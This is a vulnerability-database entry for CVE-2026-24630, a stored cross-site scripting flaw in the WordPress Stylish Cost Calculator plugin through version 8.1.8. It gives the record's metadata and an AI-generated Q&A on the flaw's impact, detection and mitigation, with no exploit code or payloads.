CVE-2026-24630
BaseFortify
Publication date: 2026-01-23
Last updated on: 2026-04-23
Assigner: Patchstack
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| patchstack | stylish_cost_calculator | to 8.1.8 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-24630 is a Cross Site Scripting (XSS) vulnerability in the WordPress Stylish Cost Calculator Plugin versions up to 8.1.8. It allows an attacker to inject malicious scripts into web pages generated by the plugin. Exploitation requires a privileged user (Contributor or Developer) to interact with a crafted link, page, or form, which then causes the malicious script to execute when other site visitors access the affected pages. [1]
How can this vulnerability impact me? :
This vulnerability can lead to attackers injecting malicious scripts that execute in the browsers of site visitors. This can result in unwanted redirects, display of advertisements, or other harmful HTML payloads. However, exploitation is unlikely due to the requirement of privileged user interaction and the vulnerability's low severity impact. No official fix is currently available. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection of this Stored Cross-Site Scripting (XSS) vulnerability involves monitoring for malicious script injections in the Stylish Cost Calculator plugin pages. Since exploitation requires user interaction with crafted inputs, you can inspect the plugin's input fields and stored data for suspicious scripts. Specific commands are not provided, but general approaches include reviewing web server logs for unusual requests, using web vulnerability scanners targeting XSS, and manually inspecting plugin data entries for injected scripts. [1]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting user roles to prevent untrusted users from performing actions that could exploit the vulnerability, such as limiting Contributor or Developer role permissions. Additionally, monitor and sanitize inputs to the Stylish Cost Calculator plugin, avoid clicking suspicious links or visiting untrusted pages, and consider disabling or removing the plugin until an official fix is released. Employing web application firewalls (WAF) to block malicious payloads may also help reduce risk. [1]